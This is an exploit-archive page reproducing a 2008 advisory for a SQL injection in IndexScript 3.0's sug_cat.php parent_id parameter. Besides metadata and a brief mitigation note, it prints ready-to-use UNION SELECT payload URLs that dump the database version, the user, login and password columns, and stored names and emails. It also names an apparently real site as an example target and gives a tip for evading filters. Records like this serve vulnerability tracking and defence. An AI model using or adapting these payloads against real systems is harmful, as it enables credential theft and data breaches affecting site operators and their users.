header-logo
Suggest Exploit
vendor:
IndexScript
by:
d3v1l (Avram Marius)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: IndexScript
Affected Version From: 3
Affected Version To: 3
Patch Exists: No
Related CWE: N/A
CPE: a:indexscript:indexscript
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

IndexScript v 3.0 [sug_cat.php?parent_id] – SQL injection Vulnerability

IndexScript v 3.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to sensitive information such as login credentials, version, database, and user information. The attacker can also use this vulnerability to modify the content of the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use the least privileged user account with access to the database.
Source

Exploit-DB raw data:

[~]-------------------------------------------------------------------------------------------------------------
[~] IndexScript v 3.0 [sug_cat.php?parent_id] - SQL injection Vulnerability
[~]
[~] http://www.indexscript.com/download.php
[~]    
[~] [IndexScript is a feature-rich and yet easy-to-use directory script that you can install for immediate use.]
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l   [Avram Marius]
[~]
[~] Date: 12.10.2008
[~]
[~]
[~] d3v1l@spoofer.com    http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig       AND      milw0rm staff
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
[~]
[~] http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
[~]
[~] Example :-
[~]
[~] http://spaceho.com/sug_cat.php?parent_id=SQL
[~]-------------------------------------------------------------------------------------------------------------
[~] btw; on some sites you need to encript your injection like [-1 UNION SELECT aes_decrypt(aes_encrypt(concat]
[~]-------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-10-13]